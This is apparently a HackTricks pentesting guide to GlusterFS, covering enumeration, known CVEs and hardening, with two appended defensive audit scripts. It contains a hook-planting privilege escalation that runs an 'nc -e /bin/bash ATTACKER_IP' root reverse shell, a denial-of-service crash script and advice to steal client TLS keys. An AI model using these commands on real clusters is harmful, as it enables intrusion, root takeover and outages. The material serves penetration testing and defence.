# 24007-24008-24009-49152 - Pentesting GlusterFS

{{#include ../banners/hacktricks-training.md}}

## Basic Information

**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **24008–24009/TCP** for brick transport, so you will still encounter those ports in legacy clusters.

```
PORT      STATE SERVICE       VERSION
24007/tcp open  glusterd      GlusterFS (RPC)
49152/tcp open  gluster-brick SSL (TLS optional)
```

> Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures.

## Enumeration

Install the client utilities on your attacking box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
```

1. **Peer discovery & health**

   ```bash
   # List peers (works without authentication in default setups)
   gluster --remote-host 10.10.11.131 peer status
   ```

2. **Volume reconnaissance**

   ```bash
   # Retrieve the list of all volumes and their configuration
   gluster --remote-host 10.10.11.131 volume info all
   ```

3. **Mount without privileges**

   ```bash
   # <VOLNAME> is one of the names returned by "volume info all"
   sudo mount -t glusterfs 10.10.11.131:/<VOLNAME> /mnt/gluster
   ```

If mounting fails, check the client-side log, which is named after the mount point (`/var/log/glusterfs/<mount-point>.log`).
Common issues are:

* TLS enforcement (`option transport.socket.ssl on`)
* Address-based access control (`option auth.allow <addresses>`)

### Certificate troubleshooting

Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log):

```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```

---

## Known Vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. |

> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.

### Exploiting `gluster_shared_storage` (Privilege Escalation)

Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run as **root** on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version.
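From the defender's side, the hook-script trick above leaves a simple artefact: an executable under `hooks/1/<event>/{pre,post}/` that nobody deployed. The script below is an added example (not HackTricks or GlusterFS code) that audits a hooks tree against an allowlist of expected scripts and flags anything unexpected, world-writable or freshly modified. It assumes the directory layout the page shows and builds a throwaway tree in a temporary directory so it runs offline; the allowlist entry `S30samba-start.sh` stands in for whatever scripts your distribution ships.

```python
#!/usr/bin/env python3
"""Audit a GlusterFS hooks tree for scripts that were not deployed on purpose.

Added example, not part of HackTricks or GlusterFS. Assumptions:
- hooks live under <root>/hooks/1/<event>/{pre,post}/ (layout shown on the page);
- the defender keeps an allowlist of expected script paths relative to <root>.
"""
import os
import shutil
import stat
import tempfile
import time

# Assumed allowlist: scripts that are supposed to exist in the tree.
ALLOWLIST = {"hooks/1/start/post/S30samba-start.sh"}


def audit_hooks(root, allowlist, max_age_seconds=None):
    """Return a sorted list of (relative_path, reasons) for suspicious hook files."""
    findings = []
    hooks_dir = os.path.join(root, "hooks")
    for dirpath, _dirs, files in os.walk(hooks_dir):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            st = os.lstat(full)
            reasons = []
            if rel not in allowlist:
                reasons.append("not in allowlist")
            # Executable that any user can rewrite: a hook nobody should trust.
            if st.st_mode & stat.S_IXUSR and st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable executable")
            if max_age_seconds is not None and time.time() - st.st_mtime < max_age_seconds:
                reasons.append("recently modified")
            if reasons:
                findings.append((rel, ", ".join(reasons)))
    return sorted(findings)


def build_demo_tree():
    """Construct a throwaway tree imitating the page's layout (constructed data)."""
    root = tempfile.mkdtemp(prefix="gss-demo-")
    post = os.path.join(root, "hooks", "1", "start", "post")
    os.makedirs(post)
    for script in ("S30samba-start.sh", "test.sh"):   # test.sh is the rogue one
        path = os.path.join(post, script)
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(path, 0o755)
    return root


def run_demo():
    """Build the demo tree, audit it and clean up; returns the findings."""
    root = build_demo_tree()
    try:
        return audit_hooks(root, ALLOWLIST)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, why in run_demo():
        print(f"SUSPICIOUS {rel}: {why}")
```

In production you would point `audit_hooks` at `/var/lib/glusterd` on each node (and at the mounted shared-storage volume) and run it from cron or a file-integrity monitor, with `max_age_seconds` set to your polling interval so newly synchronised scripts surface immediately.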
### Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct

p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131", 24007)) as s:
    s.send(struct.pack("!L", len(p.get_buffer()) | 0x80000000))
    s.send(p.get_buffer())
```

Running the script crashes `glusterfsd` < 11.0.

---

## Hardening & Detection

* **Upgrade** – current LTS is 11.1 (July 2025). All CVEs above are fixed.
* Enable **TLS** for every brick:

  ```bash
  gluster volume set <VOLNAME> transport.socket.ssl on
  gluster volume set <VOLNAME> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
  ```

* Restrict clients with CIDR lists:

  ```bash
  gluster volume set <VOLNAME> auth.allow 10.0.0.0/24
  ```

* Expose management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure the **audit-log** feature (`volume set <VOLNAME> features.audit-log on`).

---

## References

* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)

{{#include ../banners/hacktricks-training.md}}
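The same `volume info all` output an attacker reads during enumeration is what a defender can use to verify the hardening list above across every volume. The following is an added example (not HackTricks or GlusterFS code): it parses the standard `gluster volume info` layout (`Volume Name:` header, `Options Reconfigured:` block) and flags volumes with no TLS, an unrestricted `auth.allow` (GlusterFS defaults to `*`) or the audit-log feature off. The sample output is constructed; the volume ID is a placeholder. It checks the `transport.socket.ssl` key the page uses as well as the `client.ssl`/`server.ssl` pair, and treats `features.audit-log` as the option name the page recommends.

```python
#!/usr/bin/env python3
"""Flag GlusterFS volumes that miss the hardening settings listed on the page.

Added example, not part of HackTricks or GlusterFS. Assumes the standard
`gluster volume info` text layout; sample output below is constructed.
"""

# Constructed sample: one unhardened volume and one that follows the checklist.
SAMPLE = """\
Volume Name: gv0
Type: Replicate
Volume ID: 00000000-0000-0000-0000-000000000001
Status: Started
Snapshot Count: 0
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: 10.10.11.131:/data/brick1/gv0
Brick2: 10.10.11.132:/data/brick1/gv0
Options Reconfigured:
transport.address-family: inet
nfs.disable: on

Volume Name: gluster_shared_storage
Type: Replicate
Volume ID: 00000000-0000-0000-0000-000000000002
Status: Started
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: 10.10.11.131:/var/lib/glusterd/ss_brick
Brick2: 10.10.11.132:/var/lib/glusterd/ss_brick
Options Reconfigured:
auth.allow: 10.0.0.0/24
client.ssl: on
server.ssl: on
features.audit-log: on
"""

# Any of these set to "on" counts as TLS enabled (page key plus the client/server pair).
TLS_KEYS = ("transport.socket.ssl", "client.ssl", "server.ssl")


def parse_volume_info(text):
    """Parse `gluster volume info` output into {volume_name: {option: value}}."""
    volumes, current, in_options = {}, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Volume Name:"):
            current = line.split(":", 1)[1].strip()
            volumes[current] = {}
            in_options = False          # Brick lines also contain ':'; skip them
        elif line == "Options Reconfigured:":
            in_options = True
        elif in_options and current is not None and ":" in line:
            key, value = line.split(":", 1)
            volumes[current][key.strip()] = value.strip()
    return volumes


def audit_volumes(volumes):
    """Return {volume_name: [issue, ...]} for volumes that fail the checklist."""
    findings = {}
    for name, opts in volumes.items():
        issues = []
        if not any(opts.get(k) == "on" for k in TLS_KEYS):
            issues.append("TLS not enabled")
        if opts.get("auth.allow", "*") in ("*", ""):   # unset means the default '*'
            issues.append("auth.allow unrestricted (default *)")
        if opts.get("features.audit-log") != "on":
            issues.append("audit-log off")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    # Real use: audit_volumes(parse_volume_info(subprocess.check_output(
    #     ["gluster", "volume", "info", "all"], text=True)))
    for vol, issues in audit_volumes(parse_volume_info(SAMPLE)).items():
        print(f"{vol}: " + "; ".join(issues))
```

Run it against `gluster volume info all` on each peer rather than on one node only; as the page notes, heterogeneous clusters are common, and a volume option reported on one node can differ from what a stale peer still applies.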